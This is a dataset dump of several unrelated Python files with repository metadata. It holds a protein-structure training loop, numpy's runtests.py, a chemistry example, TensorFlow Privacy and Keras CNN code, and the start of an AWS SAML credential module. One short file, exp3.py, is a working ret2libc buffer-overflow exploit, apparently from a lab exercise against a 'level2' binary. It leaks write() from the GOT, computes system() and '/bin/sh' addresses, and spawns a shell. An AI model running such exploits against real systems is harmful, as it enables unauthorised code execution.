# MEASURE ERROR
# option 1: loss is MSE on output tokens
# loss_ = (target-pred)**2
# loss = loss_.mean()
# option 2: loss is RMSD on reconstructed coords
target_coords = target[:, 3:4] * target[:, :3]
pred_coords = pred[:, 3:4] * pred[:, :3]
base_coords = base[:, 3:4] * base[:, :3]
## align - sometimes svc fails - idk why
try:
pred_aligned, target_aligned = kabsch_torch(
pred_coords.t(), target_coords.t()
) # (3, N)
loss = (
(pred_aligned.t() - target_aligned.t())[
flat_chain_mask[flat_cloud_mask]
]
** 2
).mean() ** 0.5
except:
pred_aligned, target_aligned = None, None
print("svd failed convergence, ep:")
loss = None
# loss = ((pred_coords.t() - target_coords.t())[flat_chain_mask[flat_cloud_mask]] ** 2).mean() ** 0.5
# measure error
loss_base = (
(base_coords - target_coords)[flat_chain_mask[flat_cloud_mask]] ** 2
).mean() ** 0.5
del true_coords, angles, pre_target_x, edge_index, edge_attrs
del scores, target_coords, pred_coords, base_coords
del encoded, pre_target, target_aligned, pred_aligned
gc.collect()
# return loss
return {"loss": loss, "loss_base": loss_base}
def configure_optimizers(self):
optimizer = torch.optim.Adam(self.parameters(), lr=self.init_lr)
return optimizer
def on_train_start(self) -> None:
self.baseline_losses = []
self.epoch_losses = []
def training_step(self, batch, batch_idx):
output = self.forward(**batch)
loss = output["loss"]
loss_base = output["loss_base"]
if loss is None or torch.isnan(loss):
return None
self.epoch_losses.append(loss.item())
self.baseline_losses.append(loss_base.item())
self.log("train_loss", loss, on_epoch=True, prog_bar=True)
self.log("train_loss_base", output["loss_base"], on_epoch=True, prog_bar=False)
return loss
def on_train_end(self) -> None:
plt.figure(figsize=(15, 6))
plt.title(
f"Loss Evolution - Denoising of Gaussian-masked Coordinates (mu=0, sigma={self.noise})"
)
plt.plot(self.epoch_losses, label="train loss step")
for window in [8, 16, 32]:
plt.plot(
[
np.mean(self.epoch_losses[:window][0 : i + 1])
for i in range(min(window, len(self.epoch_losses)))
]
+ [
np.mean(self.epoch_losses[i : i + window + 1])
for i in range(len(self.epoch_losses) - window)
],
label="Window mean n={0}".format(window),
)
plt.plot(
np.ones(len(self.epoch_losses)) * np.mean(self.baseline_losses),
"k--",
label="Baseline",
)
plt.xlim(-0.01 * len(self.epoch_losses), 1.01 * len(self.epoch_losses))
plt.ylabel("RMSD")
plt.xlabel("Batch number")
plt.legend()
plt.savefig("loss.pdf")
def validation_step(self, batch, batch_idx):
output = self.forward(**batch)
self.log("val_loss", output["loss"], on_epoch=True, sync_dist=True)
self.log("val_loss_base", output["loss_base"], on_epoch=True, sync_dist=True)
def test_step(self, batch, batch_idx):
output = self.forward(**batch)
self.log("test_loss", output["loss"], on_epoch=True, sync_dist=True)
self.log("test_loss_base", output["loss_base"], on_epoch=True, sync_dist=True)
def get_trainer(args):
pl.seed_everything(args.seed)
# loggers
root_dir = Path(args.default_root_dir).expanduser().resolve()
root_dir.mkdir(parents=True, exist_ok=True)
tb_save_dir = root_dir / "tb"
tb_logger = TensorBoardLogger(save_dir=tb_save_dir)
loggers = [tb_logger]
logger.info(f"Run tensorboard --logdir {tb_save_dir}")
# callbacks
ckpt_cb = ModelCheckpoint(verbose=True)
lr_cb = LearningRateMonitor(logging_interval="step")
pb_cb = ProgressBar(refresh_rate=args.progress_bar_refresh_rate)
callbacks = [lr_cb, pb_cb]
callbacks.append(ckpt_cb)
gpu_cb = GPUStatsMonitor()
callbacks.append(gpu_cb)
plugins = []
trainer = pl.Trainer.from_argparse_args(
args, logger=loggers, callbacks=callbacks, plugins=plugins
)
return trainer
def main(args):
dm = ScnDataModule(**vars(args))
model = StructureModel(**vars(args))
trainer = get_trainer(args)
trainer.fit(model, datamodule=dm)
metrics = trainer.test(model, datamodule=dm)
print("test", metrics)
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument("--seed", type=int, default=23333, help="Seed everything.")
# add model specific args
parser = StructureModel.add_model_specific_args(parser)
# add data specific args
parser = ScnDataModule.add_data_specific_args(parser)
# add trainer args
parser = pl.Trainer.add_argparse_args(parser)
args = parser.parse_args()
pprint(vars(args))
main(args)
| 31.438486
| 113
| 0.602047
|
4a04f956395a2e0ac97247a117cae7eb64c0c9e6
| 18,292
|
py
|
Python
|
runtests.py
|
farziengineer/numpy
|
4ff3af387f93ff37f04f42458d4590c33f61fb9e
|
[
"BSD-3-Clause"
] | null | null | null |
runtests.py
|
farziengineer/numpy
|
4ff3af387f93ff37f04f42458d4590c33f61fb9e
|
[
"BSD-3-Clause"
] | null | null | null |
runtests.py
|
farziengineer/numpy
|
4ff3af387f93ff37f04f42458d4590c33f61fb9e
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
"""
runtests.py [OPTIONS] [-- ARGS]
Run tests, building the project first.
Examples::
$ python runtests.py
$ python runtests.py -s {SAMPLE_SUBMODULE}
$ python runtests.py -t {SAMPLE_TEST}
$ python runtests.py --ipython
$ python runtests.py --python somescript.py
$ python runtests.py --bench
$ python runtests.py --durations 20
Run a debugger:
$ gdb --args python runtests.py [...other args...]
Generate C code coverage listing under build/lcov/:
(requires http://ltp.sourceforge.net/coverage/lcov.php)
$ python runtests.py --gcov [...other args...]
$ python runtests.py --lcov-html
"""
from __future__ import division, print_function
#
# This is a generic test runner script for projects using NumPy's test
# framework. Change the following values to adapt to your project:
#
PROJECT_MODULE = "numpy"
PROJECT_ROOT_FILES = ['numpy', 'LICENSE.txt', 'setup.py']
SAMPLE_TEST = "numpy/linalg/tests/test_linalg.py::test_byteorder_check"
SAMPLE_SUBMODULE = "linalg"
EXTRA_PATH = ['/usr/lib/ccache', '/usr/lib/f90cache',
'/usr/local/lib/ccache', '/usr/local/lib/f90cache']
# ---------------------------------------------------------------------
if __doc__ is None:
__doc__ = "Run without -OO if you want usage info"
else:
__doc__ = __doc__.format(**globals())
import sys
import os
# In case we are run from the source directory, we don't want to import the
# project from there:
sys.path.pop(0)
import shutil
import subprocess
import time
from argparse import ArgumentParser, REMAINDER
ROOT_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__)))
def main(argv):
parser = ArgumentParser(usage=__doc__.lstrip())
parser.add_argument("--verbose", "-v", action="count", default=1,
help="more verbosity")
parser.add_argument("--debug-configure", action="store_true",
help=("add -v to build_src to show compiler "
"configuration output while creating "
"_numpyconfig.h and config.h"))
parser.add_argument("--no-build", "-n", action="store_true", default=False,
help="do not build the project (use system installed version)")
parser.add_argument("--build-only", "-b", action="store_true", default=False,
help="just build, do not run any tests")
parser.add_argument("--doctests", action="store_true", default=False,
help="Run doctests in module")
parser.add_argument("--refguide-check", action="store_true", default=False,
help="Run refguide (doctest) check (do not run regular tests.)")
parser.add_argument("--coverage", action="store_true", default=False,
help=("report coverage of project code. HTML output goes "
"under build/coverage"))
parser.add_argument("--durations", action="store", default=-1, type=int,
help=("Time N slowest tests, time all if 0, time none if < 0"))
parser.add_argument("--gcov", action="store_true", default=False,
help=("enable C code coverage via gcov (requires GCC). "
"gcov output goes to build/**/*.gc*"))
parser.add_argument("--lcov-html", action="store_true", default=False,
help=("produce HTML for C code coverage information "
"from a previous run with --gcov. "
"HTML output goes to build/lcov/"))
parser.add_argument("--mode", "-m", default="fast",
help="'fast', 'full', or something that could be "
"passed to nosetests -A [default: fast]")
parser.add_argument("--submodule", "-s", default=None,
help="Submodule whose tests to run (cluster, constants, ...)")
parser.add_argument("--pythonpath", "-p", default=None,
help="Paths to prepend to PYTHONPATH")
parser.add_argument("--tests", "-t", action='append',
help="Specify tests to run")
parser.add_argument("--python", action="store_true",
help="Start a Python shell with PYTHONPATH set")
parser.add_argument("--ipython", "-i", action="store_true",
help="Start IPython shell with PYTHONPATH set")
parser.add_argument("--shell", action="store_true",
help="Start Unix shell with PYTHONPATH set")
parser.add_argument("--debug", "-g", action="store_true",
help="Debug build")
parser.add_argument("--parallel", "-j", type=int, default=0,
help="Number of parallel jobs during build")
parser.add_argument("--warn-error", action="store_true",
help="Set -Werror to convert all compiler warnings to errors")
parser.add_argument("--show-build-log", action="store_true",
help="Show build output rather than using a log file")
parser.add_argument("--bench", action="store_true",
help="Run benchmark suite instead of test suite")
parser.add_argument("--bench-compare", action="store", metavar="COMMIT",
help=("Compare benchmark results of current HEAD to "
"BEFORE. Use an additional "
"--bench-compare=COMMIT to override HEAD with "
"COMMIT. Note that you need to commit your "
"changes first!"))
parser.add_argument("args", metavar="ARGS", default=[], nargs=REMAINDER,
help="Arguments to pass to Nose, Python or shell")
args = parser.parse_args(argv)
if args.durations < 0:
args.durations = -1
if args.bench_compare:
args.bench = True
args.no_build = True # ASV does the building
if args.lcov_html:
# generate C code coverage output
lcov_generate()
sys.exit(0)
if args.pythonpath:
for p in reversed(args.pythonpath.split(os.pathsep)):
sys.path.insert(0, p)
if args.gcov:
gcov_reset_counters()
if args.debug and args.bench:
print("*** Benchmarks should not be run against debug "
"version; remove -g flag ***")
if not args.no_build:
# we need the noarch path in case the package is pure python.
site_dir, site_dir_noarch = build_project(args)
sys.path.insert(0, site_dir)
sys.path.insert(0, site_dir_noarch)
os.environ['PYTHONPATH'] = site_dir + os.pathsep + site_dir_noarch
else:
_temp = __import__(PROJECT_MODULE)
site_dir = os.path.sep.join(_temp.__file__.split(os.path.sep)[:-2])
extra_argv = args.args[:]
if extra_argv and extra_argv[0] == '--':
extra_argv = extra_argv[1:]
if args.python:
# Debugging issues with warnings is much easier if you can see them
print("Enabling display of all warnings")
import warnings
import types
warnings.filterwarnings("always")
if extra_argv:
# Don't use subprocess, since we don't want to include the
# current path in PYTHONPATH.
sys.argv = extra_argv
with open(extra_argv[0], 'r') as f:
script = f.read()
sys.modules['__main__'] = types.ModuleType('__main__')
ns = dict(__name__='__main__',
__file__=extra_argv[0])
exec_(script, ns)
sys.exit(0)
else:
import code
code.interact()
sys.exit(0)
if args.ipython:
# Debugging issues with warnings is much easier if you can see them
print("Enabling display of all warnings and pre-importing numpy as np")
import warnings; warnings.filterwarnings("always")
import IPython
import numpy as np
IPython.embed(user_ns={"np": np})
sys.exit(0)
if args.shell:
shell = os.environ.get('SHELL', 'cmd' if os.name == 'nt' else 'sh')
print("Spawning a shell ({})...".format(shell))
subprocess.call([shell] + extra_argv)
sys.exit(0)
if args.coverage:
dst_dir = os.path.join(ROOT_DIR, 'build', 'coverage')
fn = os.path.join(dst_dir, 'coverage_html.js')
if os.path.isdir(dst_dir) and os.path.isfile(fn):
shutil.rmtree(dst_dir)
extra_argv += ['--cov-report=html:' + dst_dir]
if args.refguide_check:
cmd = [os.path.join(ROOT_DIR, 'tools', 'refguide_check.py'),
'--doctests']
if args.submodule:
cmd += [args.submodule]
os.execv(sys.executable, [sys.executable] + cmd)
sys.exit(0)
if args.bench:
# Run ASV
items = extra_argv
if args.tests:
items += args.tests
if args.submodule:
items += [args.submodule]
bench_args = []
for a in items:
bench_args.extend(['--bench', a])
if not args.bench_compare:
cmd = ['asv', 'run', '-n', '-e', '--python=same'] + bench_args
ret = subprocess.call(cmd, cwd=os.path.join(ROOT_DIR, 'benchmarks'))
sys.exit(ret)
else:
commits = [x.strip() for x in args.bench_compare.split(',')]
if len(commits) == 1:
commit_a = commits[0]
commit_b = 'HEAD'
elif len(commits) == 2:
commit_a, commit_b = commits
else:
p.error("Too many commits to compare benchmarks for")
# Check for uncommitted files
if commit_b == 'HEAD':
r1 = subprocess.call(['git', 'diff-index', '--quiet',
'--cached', 'HEAD'])
r2 = subprocess.call(['git', 'diff-files', '--quiet'])
if r1 != 0 or r2 != 0:
print("*"*80)
print("WARNING: you have uncommitted changes --- "
"these will NOT be benchmarked!")
print("*"*80)
# Fix commit ids (HEAD is local to current repo)
out = subprocess.check_output(['git', 'rev-parse', commit_b])
commit_b = out.strip().decode('ascii')
out = subprocess.check_output(['git', 'rev-parse', commit_a])
commit_a = out.strip().decode('ascii')
cmd = ['asv', 'continuous', '-e', '-f', '1.05',
commit_a, commit_b] + bench_args
ret = subprocess.call(cmd, cwd=os.path.join(ROOT_DIR, 'benchmarks'))
sys.exit(ret)
if args.build_only:
sys.exit(0)
else:
__import__(PROJECT_MODULE)
test = sys.modules[PROJECT_MODULE].test
if args.submodule:
tests = [PROJECT_MODULE + "." + args.submodule]
elif args.tests:
tests = args.tests
else:
tests = None
# Run the tests under build/test
if not args.no_build:
test_dir = site_dir
else:
test_dir = os.path.join(ROOT_DIR, 'build', 'test')
if not os.path.isdir(test_dir):
os.makedirs(test_dir)
shutil.copyfile(os.path.join(ROOT_DIR, '.coveragerc'),
os.path.join(test_dir, '.coveragerc'))
cwd = os.getcwd()
try:
os.chdir(test_dir)
result = test(args.mode,
verbose=args.verbose,
extra_argv=extra_argv,
doctests=args.doctests,
coverage=args.coverage,
durations=args.durations,
tests=tests)
finally:
os.chdir(cwd)
if isinstance(result, bool):
sys.exit(0 if result else 1)
elif result.wasSuccessful():
sys.exit(0)
else:
sys.exit(1)
def build_project(args):
"""
Build a dev version of the project.
Returns
-------
site_dir
site-packages directory where it was installed
"""
import distutils.sysconfig
root_ok = [os.path.exists(os.path.join(ROOT_DIR, fn))
for fn in PROJECT_ROOT_FILES]
if not all(root_ok):
print("To build the project, run runtests.py in "
"git checkout or unpacked source")
sys.exit(1)
dst_dir = os.path.join(ROOT_DIR, 'build', 'testenv')
env = dict(os.environ)
cmd = [sys.executable, 'setup.py']
# Always use ccache, if installed
env['PATH'] = os.pathsep.join(EXTRA_PATH + env.get('PATH', '').split(os.pathsep))
cvars = distutils.sysconfig.get_config_vars()
compiler = env.get('CC') or cvars.get('CC', '')
if 'gcc' in compiler:
# Check that this isn't clang masquerading as gcc.
if sys.platform != 'darwin' or 'gnu-gcc' in compiler:
# add flags used as werrors
warnings_as_errors = ' '.join([
# from tools/travis-test.sh
'-Werror=vla',
'-Werror=nonnull',
'-Werror=pointer-arith',
'-Wlogical-op',
# from sysconfig
'-Werror=unused-function',
])
env['CFLAGS'] = warnings_as_errors + ' ' + env.get('CFLAGS', '')
if args.debug or args.gcov:
# assume everyone uses gcc/gfortran
env['OPT'] = '-O0 -ggdb'
env['FOPT'] = '-O0 -ggdb'
if args.gcov:
env['OPT'] = '-O0 -ggdb'
env['FOPT'] = '-O0 -ggdb'
env['CC'] = cvars['CC'] + ' --coverage'
env['CXX'] = cvars['CXX'] + ' --coverage'
env['F77'] = 'gfortran --coverage '
env['F90'] = 'gfortran --coverage '
env['LDSHARED'] = cvars['LDSHARED'] + ' --coverage'
env['LDFLAGS'] = " ".join(cvars['LDSHARED'].split()[1:]) + ' --coverage'
cmd += ["build"]
if args.parallel > 1:
cmd += ["-j", str(args.parallel)]
if args.debug_configure:
cmd += ["build_src", "--verbose"]
if args.warn_error:
cmd += ["--warn-error"]
# Install; avoid producing eggs so numpy can be imported from dst_dir.
cmd += ['install', '--prefix=' + dst_dir,
'--single-version-externally-managed',
'--record=' + dst_dir + 'tmp_install_log.txt']
from distutils.sysconfig import get_python_lib
site_dir = get_python_lib(prefix=dst_dir, plat_specific=True)
site_dir_noarch = get_python_lib(prefix=dst_dir, plat_specific=False)
# easy_install won't install to a path that Python by default cannot see
# and isn't on the PYTHONPATH. Plus, it has to exist.
if not os.path.exists(site_dir):
os.makedirs(site_dir)
if not os.path.exists(site_dir_noarch):
os.makedirs(site_dir_noarch)
env['PYTHONPATH'] = site_dir + ':' + site_dir_noarch
log_filename = os.path.join(ROOT_DIR, 'build.log')
if args.show_build_log:
ret = subprocess.call(cmd, env=env, cwd=ROOT_DIR)
else:
log_filename = os.path.join(ROOT_DIR, 'build.log')
print("Building, see build.log...")
with open(log_filename, 'w') as log:
p = subprocess.Popen(cmd, env=env, stdout=log, stderr=log,
cwd=ROOT_DIR)
try:
# Wait for it to finish, and print something to indicate the
# process is alive, but only if the log file has grown (to
# allow continuous integration environments kill a hanging
# process accurately if it produces no output)
last_blip = time.time()
last_log_size = os.stat(log_filename).st_size
while p.poll() is None:
time.sleep(0.5)
if time.time() - last_blip > 60:
log_size = os.stat(log_filename).st_size
if log_size > last_log_size:
print(" ... build in progress")
last_blip = time.time()
last_log_size = log_size
ret = p.wait()
except:
p.kill()
p.wait()
raise
if ret == 0:
print("Build OK")
else:
if not args.show_build_log:
with open(log_filename, 'r') as f:
print(f.read())
print("Build failed!")
sys.exit(1)
return site_dir, site_dir_noarch
#
# GCOV support
#
def gcov_reset_counters():
print("Removing previous GCOV .gcda files...")
build_dir = os.path.join(ROOT_DIR, 'build')
for dirpath, dirnames, filenames in os.walk(build_dir):
for fn in filenames:
if fn.endswith('.gcda') or fn.endswith('.da'):
pth = os.path.join(dirpath, fn)
os.unlink(pth)
#
# LCOV support
#
LCOV_OUTPUT_FILE = os.path.join(ROOT_DIR, 'build', 'lcov.out')
LCOV_HTML_DIR = os.path.join(ROOT_DIR, 'build', 'lcov')
def lcov_generate():
try: os.unlink(LCOV_OUTPUT_FILE)
except OSError: pass
try: shutil.rmtree(LCOV_HTML_DIR)
except OSError: pass
print("Capturing lcov info...")
subprocess.call(['lcov', '-q', '-c',
'-d', os.path.join(ROOT_DIR, 'build'),
'-b', ROOT_DIR,
'--output-file', LCOV_OUTPUT_FILE])
print("Generating lcov HTML output...")
ret = subprocess.call(['genhtml', '-q', LCOV_OUTPUT_FILE,
'--output-directory', LCOV_HTML_DIR,
'--legend', '--highlight'])
if ret != 0:
print("genhtml failed!")
else:
print("HTML output generated under build/lcov/")
#
# Python 3 support
#
if sys.version_info[0] >= 3:
import builtins
exec_ = getattr(builtins, "exec")
else:
def exec_(code, globs=None, locs=None):
"""Execute code in a namespace."""
if globs is None:
frame = sys._getframe(1)
globs = frame.f_globals
if locs is None:
locs = frame.f_locals
del frame
elif locs is None:
locs = globs
exec("""exec code in globs, locs""")
if __name__ == "__main__":
main(argv=sys.argv[1:])
| 36.438247
| 88
| 0.560245
|
4a04fb97b1a6aac85ba2d8e61a85fb063ed767f5
| 551
|
py
|
Python
|
examples/ex9_adding_substrates_from_files.py
|
duartegroup/cgbind
|
8c2369d4c49e8b008fc3951719d99e0c4f6b6b16
|
[
"MIT"
] | 7
|
2020-06-08T16:18:56.000Z
|
2021-01-28T09:59:16.000Z
|
examples/ex9_adding_substrates_from_files.py
|
duartegroup/cgbind
|
8c2369d4c49e8b008fc3951719d99e0c4f6b6b16
|
[
"MIT"
] | null | null | null |
examples/ex9_adding_substrates_from_files.py
|
duartegroup/cgbind
|
8c2369d4c49e8b008fc3951719d99e0c4f6b6b16
|
[
"MIT"
] | 2
|
2020-11-16T04:52:43.000Z
|
2021-06-04T05:07:29.000Z
|
from cgbind import Cage, Substrate, Linker, CageSubstrateComplex
# Generate an M4L6 bipyridyl Fe(III) based metallocage
linker = Linker(name='linker',
smiles='C1(C2=CC=C(C#CC3=CN=C(C4=NC=CC=C4)C=C3)C=N2)=NC=CC=C1',
arch_name='m4l6n')
cage = Cage(linker, metal='Fe', metal_charge='3')
# Initialise a substrate from the .xyz file, setting the charge and spin
# multiplicity
substrate = Substrate(name='PhO-', filename='phenoxide.xyz', charge=-1, mult=1)
cs = CageSubstrateComplex(cage, substrate)
cs.print_xyz_file()
| 34.4375
| 79
| 0.700544
|
4a04fbcae8f339821b5dd1fee169c1c63ac1c9b2
| 2,567
|
py
|
Python
|
tensorflow_privacy/privacy/estimators/head_utils.py
|
andrewyguo/privacy
|
a33afde0c105ece6c48b17a80f13899cf3e7c1b3
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_privacy/privacy/estimators/head_utils.py
|
andrewyguo/privacy
|
a33afde0c105ece6c48b17a80f13899cf3e7c1b3
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_privacy/privacy/estimators/head_utils.py
|
andrewyguo/privacy
|
a33afde0c105ece6c48b17a80f13899cf3e7c1b3
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020, The TensorFlow Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Estimator heads that allow integration with TF Privacy."""
from tensorflow_privacy.privacy.estimators.binary_class_head import DPBinaryClassHead
from tensorflow_privacy.privacy.estimators.multi_class_head import DPMultiClassHead
def binary_or_multi_class_head(n_classes, weight_column, label_vocabulary,
loss_reduction):
"""Creates either binary or multi-class head.
Args:
n_classes: Number of label classes.
weight_column: A string or a `NumericColumn` created by
`tf.feature_column.numeric_column` defining feature column representing
weights. It is used to down weight or boost examples during training. It
will be multiplied by the loss of the example. If it is a string, it is
used as a key to fetch weight tensor from the `features`. If it is a
`NumericColumn`, raw tensor is fetched by key `weight_column.key`, then
weight_column.normalizer_fn is applied on it to get weight tensor.
label_vocabulary: A list of strings represents possible label values. If
given, labels must be string type and have any value in
`label_vocabulary`. If it is not given, that means labels are already
encoded as integer or float within [0, 1] for `n_classes=2` and encoded as
integer values in {0, 1,..., n_classes-1} for `n_classes`>2 . Also there
will be errors if vocabulary is not provided and labels are string.
loss_reduction: One of `tf.losses.Reduction` except `NONE`. Defines how to
reduce training loss over batch. Defaults to `SUM_OVER_BATCH_SIZE`.
Returns:
A `Head` instance.
"""
if n_classes == 2:
head = DPBinaryClassHead(
weight_column=weight_column,
label_vocabulary=label_vocabulary,
loss_reduction=loss_reduction)
else:
head = DPMultiClassHead(
n_classes,
weight_column=weight_column,
label_vocabulary=label_vocabulary,
loss_reduction=loss_reduction)
return head
| 45.035088
| 85
| 0.73471
|
4a04fc42f63d36c535bffbb99af63f66d3094945
| 120
|
py
|
Python
|
evaluation/__init__.py
|
mertozlutiras/BERTopic_evaluation
|
95b728947b73193caaf7c303fd91f4d8b779c807
|
[
"MIT"
] | 12
|
2022-03-14T07:59:58.000Z
|
2022-03-16T09:14:52.000Z
|
evaluation/__init__.py
|
mertozlutiras/BERTopic_evaluation
|
95b728947b73193caaf7c303fd91f4d8b779c807
|
[
"MIT"
] | null | null | null |
evaluation/__init__.py
|
mertozlutiras/BERTopic_evaluation
|
95b728947b73193caaf7c303fd91f4d8b779c807
|
[
"MIT"
] | 2
|
2022-03-14T07:47:05.000Z
|
2022-03-15T09:20:00.000Z
|
from evaluation.data import DataLoader
from evaluation.evaluation import Trainer
from evaluation.results import Results
| 30
| 41
| 0.875
|
4a04fd1c4187d9164cb1731b6c09f76d1e33e3d6
| 1,045
|
py
|
Python
|
exp3.py
|
TonyShanc/new2pwn
|
6b127fca32e96ff1953dc25c6981610176b927be
|
[
"MIT"
] | null | null | null |
exp3.py
|
TonyShanc/new2pwn
|
6b127fca32e96ff1953dc25c6981610176b927be
|
[
"MIT"
] | null | null | null |
exp3.py
|
TonyShanc/new2pwn
|
6b127fca32e96ff1953dc25c6981610176b927be
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
from pwn import *
libc = ELF('libc.so')
elf = ELF('level2')
#p = process('./level2')
p = remote('127.0.0.1', 10003)
plt_write = elf.symbols['write']
print 'plt_write= ' + hex(plt_write)
got_write = elf.got['write']
print 'got_write= ' + hex(got_write)
vulfun_addr = 0x08048404
print 'vulfun= ' + hex(vulfun_addr)
payload1 = 'a'*140 + p32(plt_write) + p32(vulfun_addr) + p32(1) +p32(got_write) + p32(4)
print "\n###sending payload1 ...###"
p.send(payload1)
print "\n###receving write() addr...###"
write_addr = u32(p.recv(4))
print 'write_addr=' + hex(write_addr)
print "\n###calculating system() addr and \"/bin/sh\" addr...###"
system_addr = write_addr - (libc.symbols['write'] - libc.symbols['system'])
print 'system_addr= ' + hex(system_addr)
binsh_addr = write_addr - (libc.symbols['write'] - next(libc.search('/bin/sh')))
print 'binsh_addr= ' + hex(binsh_addr)
payload2 = 'a'*140 + p32(system_addr) + p32(vulfun_addr) + p32(binsh_addr)
print "\n###sending payload2 ...###"
p.send(payload2)
p.interactive()
| 26.794872
| 88
| 0.664115
|
4a04fd8030387094a40d9737c936a1f2f3d961e3
| 2,849
|
py
|
Python
|
python/hongong/source/8_2.py
|
gangserver/py_test
|
869bdfa5c94c3b6a15b87e0c3de6b2cdaca821f4
|
[
"Apache-2.0"
] | null | null | null |
python/hongong/source/8_2.py
|
gangserver/py_test
|
869bdfa5c94c3b6a15b87e0c3de6b2cdaca821f4
|
[
"Apache-2.0"
] | null | null | null |
python/hongong/source/8_2.py
|
gangserver/py_test
|
869bdfa5c94c3b6a15b87e0c3de6b2cdaca821f4
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""8-2.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/github/rickiepark/hg-mldl/blob/master/8-2.ipynb
# 합성곱 신경망을 사용한 이미지 분류
<table align="left">
<td>
<a target="_blank" href="https://colab.research.google.com/github/rickiepark/hg-mldl/blob/master/8-2.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />구글 코랩에서 실행하기</a>
</td>
</table>
## 패션 MNIST 데이터 불러오기
"""
from tensorflow import keras
from sklearn.model_selection import train_test_split
(train_input, train_target), (test_input, test_target) = \
keras.datasets.fashion_mnist.load_data()
train_scaled = train_input.reshape(-1, 28, 28, 1) / 255.0
train_scaled, val_scaled, train_target, val_target = train_test_split(
train_scaled, train_target, test_size=0.2, random_state=42)
"""## 합성곱 신경망 만들기"""
model = keras.Sequential()
model.add(keras.layers.Conv2D(32, kernel_size=3, activation='relu',
padding='same', input_shape=(28,28,1)))
model.add(keras.layers.MaxPooling2D(2))
model.add(keras.layers.Conv2D(64, kernel_size=(3,3), activation='relu',
padding='same'))
model.add(keras.layers.MaxPooling2D(2))
model.add(keras.layers.Flatten())
model.add(keras.layers.Dense(100, activation='relu'))
model.add(keras.layers.Dropout(0.4))
model.add(keras.layers.Dense(10, activation='softmax'))
model.summary()
keras.utils.plot_model(model)
keras.utils.plot_model(model, show_shapes=True, to_file='cnn-architecture.png', dpi=300)
"""## 모델 컴파일과 훈련"""
model.compile(optimizer='adam', loss='sparse_categorical_crossentropy',
metrics='accuracy')
checkpoint_cb = keras.callbacks.ModelCheckpoint('best-cnn-model.h5',
save_best_only=True)
early_stopping_cb = keras.callbacks.EarlyStopping(patience=2,
restore_best_weights=True)
history = model.fit(train_scaled, train_target, epochs=20,
validation_data=(val_scaled, val_target),
callbacks=[checkpoint_cb, early_stopping_cb])
import matplotlib.pyplot as plt
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.xlabel('epoch')
plt.ylabel('loss')
plt.legend(['train', 'val'])
plt.show()
model.evaluate(val_scaled, val_target)
plt.imshow(val_scaled[0].reshape(28, 28), cmap='gray_r')
plt.show()
preds = model.predict(val_scaled[0:1])
print(preds)
plt.bar(range(1, 11), preds[0])
plt.xlabel('class')
plt.ylabel('prob.')
plt.show()
classes = ['티셔츠', '바지', '스웨터', '드레스', '코트',
'샌달', '셔츠', '스니커즈', '가방', '앵클 부츠']
import numpy as np
print(classes[np.argmax(preds)])
test_scaled = test_input.reshape(-1, 28, 28, 1) / 255.0
model.evaluate(test_scaled, test_target)
| 28.777778
| 195
| 0.678133
|
4a04fdc3c055c5b42928f2030fc7c2d4f6e824ca
| 16,987
|
py
|
Python
|
awsprocesscreds/saml.py
|
gbvanrenswoude/awsprocesscreds
|
99c8a20361ebd495d057e7960e5ef4578d1b3780
|
[
"Apache-2.0"
] | null | null | null |
awsprocesscreds/saml.py
|
gbvanrenswoude/awsprocesscreds
|
99c8a20361ebd495d057e7960e5ef4578d1b3780
|
[
"Apache-2.0"
] | null | null | null |
awsprocesscreds/saml.py
|
gbvanrenswoude/awsprocesscreds
|
99c8a20361ebd495d057e7960e5ef4578d1b3780
|
[
"Apache-2.0"
] | 1
|
2020-03-18T10:38:43.000Z
|
2020-03-18T10:38:43.000Z
|
# pylint: disable=R1710
import base64
import getpass
import logging
import xml.etree.cElementTree as ET
from hashlib import sha1
from copy import deepcopy
import six
import requests
import botocore
from botocore.client import Config
from botocore.compat import urlsplit
from botocore.compat import urljoin
from botocore.compat import json
from botocore.credentials import CachedCredentialFetcher
import botocore.session
import awsprocesscreds
from .compat import escape
class SAMLError(Exception):
pass
logger = logging.getLogger(__name__)
class FormParserError(Exception):
pass
def _role_selector(role_arn, roles):
"""Select a role based on pre-configured role_arn and IdP roles list.
Given a roles list in the form of [{"RoleArn": "...", ...}, ...],
return the item which matches the role_arn, or None otherwise.
"""
chosen = [r for r in roles if r['RoleArn'] == role_arn]
return chosen[0] if chosen else None
class SAMLAuthenticator(object):
def is_suitable(self, config):
"""Return True if this instance intends to perform authentication.
:type config: dict
:param config: It is the profile dictionary loaded from user's profile,
i.e. {'saml_endpoint': 'https://...', 'saml_provider': '...', ...}
"""
raise NotImplementedError("is_suitable")
def retrieve_saml_assertion(self, config):
"""Return SAML assertion when login succeeds, or None otherwise."""
raise NotImplementedError("retrieve_saml_assertion")
class GenericFormsBasedAuthenticator(SAMLAuthenticator):
USERNAME_FIELDS = ('username',)
PASSWORD_FIELDS = ('password',)
_ERROR_BAD_RESPONSE = (
'Received a non-200 response (%s) when making a request to: %s'
)
_ERROR_NO_FORM = (
'Could not find login form from: %s'
)
_ERROR_MISSING_FORM_FIELD = (
'Error parsing HTML form, could not find the form field: "%s"'
)
_ERROR_LOGIN_FAILED_NON_200 = (
'Login failed, received non 200 response: %s'
)
_ERROR_LOGIN_FAILED = (
'Login failed, could not retrieve SAML assertion. '
'Double check you have entered your password correctly.'
)
_ERROR_MISSING_CONFIG = (
'Missing required config value for SAML: "%s"'
)
def __init__(self, password_prompter, requests_session=None):
"""Retrieve SAML assertion using form based auth.
This class can retrieve a SAML assertion by using form
based auth. The supported workflow is:
